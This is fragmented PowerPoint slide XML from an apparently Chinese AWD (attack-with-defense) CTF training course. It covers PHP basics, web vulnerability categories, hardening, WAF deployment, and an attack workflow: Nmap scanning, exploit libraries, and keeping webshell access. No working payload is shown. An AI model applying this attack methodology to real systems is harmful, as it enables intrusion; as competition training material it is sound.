              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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攻防之攻击 四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、A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="114" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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攻防之脚本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285"/>
            <a:ext cx="12191999" cy="67854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305" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468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4069" y="667257"/>
            <a:ext cx="1633855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605" y="1464945"/>
            <a:ext cx="9752330" cy="39947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7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7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70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代码注释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0005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395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7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多行注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释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40005" marR="5754370">
              <a:lnSpc>
                <a:spcPct val="119000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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单行注释  </a:t>
            </a:r>
            <a:endParaRPr sz="1700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0005" marR="5754370">
              <a:lnSpc>
                <a:spcPct val="119000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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#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单行注释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0005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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变量赋值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6041390">
              <a:lnSpc>
                <a:spcPct val="119000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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$a=1;  </a:t>
            </a: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12700" marR="6041390">
              <a:lnSpc>
                <a:spcPct val="119000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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7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$a;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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="38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输出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和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print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可以输出一个或多个字符串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只允许输出一个字符串，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返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回值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总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为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-75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提示</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：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输出的速度</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="405" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>比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17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快，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-50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没有返回值</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-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有返回值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483235" y="591820"/>
            <a:ext cx="54737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14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5265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5" y="1229995"/>
            <a:ext cx="9444990" cy="46850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49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字符串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$str=“hello”;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4192270">
              <a:lnSpc>
                <a:spcPct val="119000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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$name = “zhang.san”;  echo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$str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. “ ” .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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$name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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="39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PHP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strlen()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函数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strlen()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函数返回字符串的长度（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字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节数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）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7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strlen(“$str”);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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="38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判断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700" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>（）</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-55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条件成立时执行的代码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内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容；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elseif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()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条件成立时执行的代码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内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容；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条件不成立时执行的代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码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内容；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483235" y="591820"/>
            <a:ext cx="54737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15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480"/>
            <a:ext cx="12082817" cy="67854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485" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468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235" y="580390"/>
            <a:ext cx="7067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16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069" y="64122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401" y="1179423"/>
            <a:ext cx="2106930" cy="203453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86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循环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条件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83235">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="495300" algn="l"/>
                <a:tab pos="49530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要执行的代码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2401" y="3590899"/>
            <a:ext cx="2106930" cy="20313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do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83235">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="495300" algn="l"/>
                <a:tab pos="49530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要执行的代码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条件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6757" y="1269132"/>
            <a:ext cx="2599690" cy="19335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494F4F"/>
              </a:buClr>
              <a:buSzPct val="80000"/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循环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5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初始</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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值</a:t>
            </a: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spc="-45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条件</a:t>
            </a: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spc="-3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增量</a:t>
            </a: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99795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要执行的代码</a:t>
            </a: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748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790" y="131826"/>
            <a:ext cx="11744325" cy="6390640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11744325" h="6390640">
                <a:moveTo>
                  <a:pt x="0" y="6390132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6390132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6390132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r>
              <a:rPr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654" y="65328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680" y="1189990"/>
            <a:ext cx="7998460" cy="38468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59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php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获取表单数据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$_GET[‘str’];</a:t>
            </a:r>
            <a:endParaRPr sz="14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$_POST[‘str’];</a:t>
            </a:r>
            <a:endParaRPr sz="14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 marR="5616575" indent="27305">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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文件包含 </a:t>
            </a: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include ‘filename’;  require ‘filename’;  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注：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require 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一般放在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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PHP 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文件的最前面，程序在执行前就会先导入要引用的文件；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include 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一般放在程序的流程控制中，当程序执行时碰到才会引用，简化程序的执行流程。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95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</a:pPr>
            <a:r>
              <a:rPr sz="1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require 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引入的文件有错误时，执行会中断，并返回一个致命错误；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include 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引入的文件有错误时，会继续执行，并返回一个警告。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</a:pPr>
            <a:endParaRPr sz="20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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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文件处理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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="14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 marR="4262120">
              <a:lnSpc>
                <a:spcPct val="129000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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$file = fopen(“test.txt”,“r”); //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读文件 </a:t>
            </a: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fclose($file); //</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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关闭文件</a:t>
            </a:r>
            <a:endParaRPr sz="14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?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" kern="0" dirty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5328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3060" y="1228090"/>
            <a:ext cx="9175750" cy="50222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75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文件上传</a:t>
            </a:r>
            <a:endParaRPr sz="15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通过使用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PHP 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的全局数组</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" kern="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$_FILES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，你可以从客户计算机向远程服务器上传</a:t>
            </a:r>
            <a:endParaRPr sz="15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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="995"/>
              </a:spcBef>
            </a:pP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第一个参数是表单的 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input name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，第二个下标可以是 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“name”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“type”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“size”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、 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“tmp_name” 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或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“error”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endParaRPr sz="15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&lt;?php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if ($_FILES["file"]["error"] &gt; 0)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{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203200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635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echo "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错误：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" . $_FILES["file"]["error"] . "&lt;br&gt;";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}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{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203200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635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echo "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上传文件名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: " . $_FILES["file"]["name"] . "&lt;br&gt;";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203200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635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echo "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文件类型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: " . $_FILES["file"]["type"] . "&lt;br&gt;";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203200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635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echo "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文件大小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: " . ($_FILES["file"]["size"] / 1024) . " kB&lt;br&gt;";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203200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650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echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>文件临时存储的位置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>: " . $_FILES["file"]["tmp_name"];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}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500" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1500" kern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18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4544" y="64122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源 码 审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计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0230" y="1181100"/>
            <a:ext cx="7366635" cy="53009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91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连接数据库</a:t>
            </a:r>
            <a:endParaRPr sz="16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&lt;?php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$servername = "localhost";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$username = "username";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$password = "password";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创建连接，生成实例对象</a:t>
            </a:r>
            <a:endParaRPr sz="16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$conn = new mysqli($servername, $username, $password);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检测连接</a:t>
            </a:r>
            <a:endParaRPr sz="16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if ($conn-&gt;connect_error) {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215265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80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die("</a:t>
            </a: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连接失败</a:t>
            </a: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: " . $conn-&gt;connect_error);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}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echo "</a:t>
            </a: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连接成功</a:t>
            </a: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";</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern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Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:uFillTx/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45" y="580390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19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8834" y="65328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漏 洞 验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证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580" y="1299210"/>
            <a:ext cx="8369300" cy="29616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针对我们常见的web漏洞进行相应的测试操作：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20"/>
              </a:spcBef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一句话木马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10"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/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SQL注入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10"/>
              </a:spcBef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文件包含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20"/>
              </a:spcBef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文件上传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10"/>
              </a:spcBef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越权访问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10"/>
              </a:spcBef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命令执行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20"/>
              </a:spcBef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反序列化</a:t>
            </a:r>
            <a:endParaRPr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20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7491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790" y="147065"/>
            <a:ext cx="11744325" cy="6390640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11744325" h="6390640">
                <a:moveTo>
                  <a:pt x="0" y="6390132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6390132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6390132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38834" y="667257"/>
            <a:ext cx="1633855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漏 洞 修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复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452" y="1299001"/>
            <a:ext cx="7413625" cy="35280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修复原则：</a:t>
            </a:r>
            <a:endParaRPr sz="24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720"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="38354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能修复的尽量修复</a:t>
            </a:r>
            <a:endParaRPr sz="24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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="32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5"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="38354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不能修复的先注释源码，不影响页面显示在进行删除</a:t>
            </a:r>
            <a:endParaRPr sz="24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Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="32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spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="38354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尝试记录尽可能多的过滤函数或者安全函数</a:t>
            </a:r>
            <a:endParaRPr sz="24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Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="32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82905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="38354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站点和对应的页面功能不能down机</a:t>
            </a:r>
            <a:endParaRPr sz="24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21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8834" y="63042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文 件 监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控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580" y="1507490"/>
            <a:ext cx="10336530" cy="12763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870"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="383540" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="24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自备文件监控脚本（python、shell、php）</a:t>
            </a:r>
            <a:endParaRPr sz="24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 marR="5080">
              <a:lnSpc>
                <a:spcPts val="2540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="24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可以实时监控站点目录是否遭到可疑篡改，或者被挂马， 若出现此种情况，立即恢复。</a:t>
            </a:r>
            <a:endParaRPr sz="24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22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6139" y="629792"/>
            <a:ext cx="199072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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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b="1" spc="-3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F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脚 本 部</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="3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署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5885" y="1390650"/>
            <a:ext cx="9164955" cy="293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➢"/>
              <a:tabLst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原理：通过过滤某些参数，抵御大部分攻击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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pP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5600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
              <a:buChar char="➢"/>
              <a:tabLst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注意：waf过滤太严格，会导致某些服务down机，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5600">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc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check失败导致扣分，所以要谨慎使用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5600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="➢"/>
              <a:tabLst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使用方法：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在需要防护页面添加require_once(‘waf.php’);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可以在公用代码页中调用；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可以使用第三方软件或者安全狗之类的；</a:t>
            </a:r>
            <a:endParaRPr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23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285"/>
            <a:ext cx="12191999" cy="67854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790" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944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695" y="693801"/>
            <a:ext cx="2917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一、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-30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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的概念</a:t>
            </a:r>
            <a:endParaRPr sz="3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317" y="1566016"/>
            <a:ext cx="2750820" cy="333438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35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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="75" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>AWD？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线下环境拓扑分析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spc="-5" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>比赛规则和内容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题目类型分析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spc="-85" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="30" dirty="0"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400" b="1" spc="45" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a: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方式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竞赛分工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957"/>
            <a:ext cx="12191999" cy="67850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790" y="285750"/>
            <a:ext cx="11744325" cy="6390640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11744325" h="6390640">
                <a:moveTo>
                  <a:pt x="0" y="6390132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6390132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6390132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4069" y="652652"/>
            <a:ext cx="199072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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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b="1" spc="-3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F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脚 本 部</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="3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署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815" y="1557020"/>
            <a:ext cx="8151495" cy="2591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820"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="38354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常用php系统添加waf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6223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①	PHPCMS V9 \phpcms\base.php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23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②	PHPWIND8.7 \data\sql_config.php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6223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③	DEDECMS5.7 \data\common.inc.php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6223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④	DiscuzX2 \config\config_global.php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23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⑤	Wordpress \wp-config.php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23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⑥	Metinfo \include\head.php</a:t>
            </a:r>
            <a:endParaRPr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24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233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课程目录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12558" y="2983229"/>
            <a:ext cx="254127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一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60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的概念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10515">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1945"/>
              </a:spcBef>
            </a:pP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二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60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攻防之加固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10515" marR="30480" indent="-273050">
              <a:lnSpc>
                <a:spcPts val="4110"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F44F53"/>
              </a:buClr>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="311150" algn="l"/>
              </a:tabLst>
            </a:pP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三</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-4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A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="14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WD</a:t>
            </a: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攻防之攻击 </a:t>
            </a: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四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60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攻防之脚本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285"/>
            <a:ext cx="12191999" cy="67854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790" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944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695" y="693801"/>
            <a:ext cx="37293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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-30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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻防之</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>击</a:t>
            </a:r>
            <a:endParaRPr sz="3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997" y="1828546"/>
            <a:ext cx="1837689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攻击流程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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="46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流量监控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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="46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日志分析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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="46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干掉不死马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603" y="630631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069" y="63042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攻 击 流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程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069" y="1245819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思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>一般流程：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5963" y="2086355"/>
            <a:ext cx="8125968" cy="38740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653" y="569671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754" y="63042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攻 击 流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程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0" y="1390650"/>
            <a:ext cx="9630410" cy="368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 panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="241935" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="24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信息收集</a:t>
            </a:r>
            <a:endParaRPr sz="24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 algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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第一步，探测主机。用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a: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或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>HTTPScan</a:t>
            </a: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等工具，先扫描主办方给的 内网存活主机，弄明白网络拓扑。如果主办方给了主机范围的话就更加 省事儿了。</a:t>
            </a:r>
            <a:endParaRPr sz="19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33020" algn="just">
              <a:lnSpc>
                <a:spcPct val="89000"/>
              </a:lnSpc>
            </a:pP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第二步，探测端口。因为主办方给的机器都是一样的，所以直接看自己 开了什么端口就行。如果不一样的话，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a: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进行常见端口扫描，  先攻击常见端口，再放后台进行全端口的扫描，发现新端口再加入到攻 击队列中。</a:t>
            </a:r>
            <a:endParaRPr sz="19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</a:pPr>
            <a:endParaRPr sz="305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62865">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
            </a:pP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第三步，探测端口服务。端口服务一般用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a: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就能扫到，并且可以用 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a: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的脚本扫一下漏洞，但是需要注意 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的相关参数，这要根据 情况灵活运用。</a:t>
            </a:r>
            <a:endParaRPr sz="1900" kern="0">
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000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119" y="63042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攻 击 流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程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152" y="1390853"/>
            <a:ext cx="11174730" cy="270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kern="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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="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攻击</a:t>
            </a:r>
            <a:endParaRPr sz="24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>
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a: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方面的语言多为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a: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，小部分为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Java </a:t>
            </a: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和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a: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。这里的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a: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环境分两种情况，  一种是已有漏洞的框架，一种是出题人写的框架。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern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6350">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1005"/>
              </a:spcBef>
            </a:pP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如果是已有漏洞的框架，通常会比较明显。比如说 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Struts2 </a:t>
            </a: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各种漏洞等等，用工具扫 就可以扫出来。这个需要准备得比较充分，在电脑中备好 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>EXP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>库、漏洞库和各种扫 描工具库，以便能够快速利用比较明显的漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="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975" y="56959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3594" y="63042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攻 击 流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程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152" y="1390853"/>
            <a:ext cx="1102741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权限维持</a:t>
            </a:r>
            <a:endParaRPr sz="24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ts val="2205"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef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拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>webshell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后，当然是要维持权限啦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！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简单</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="409" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
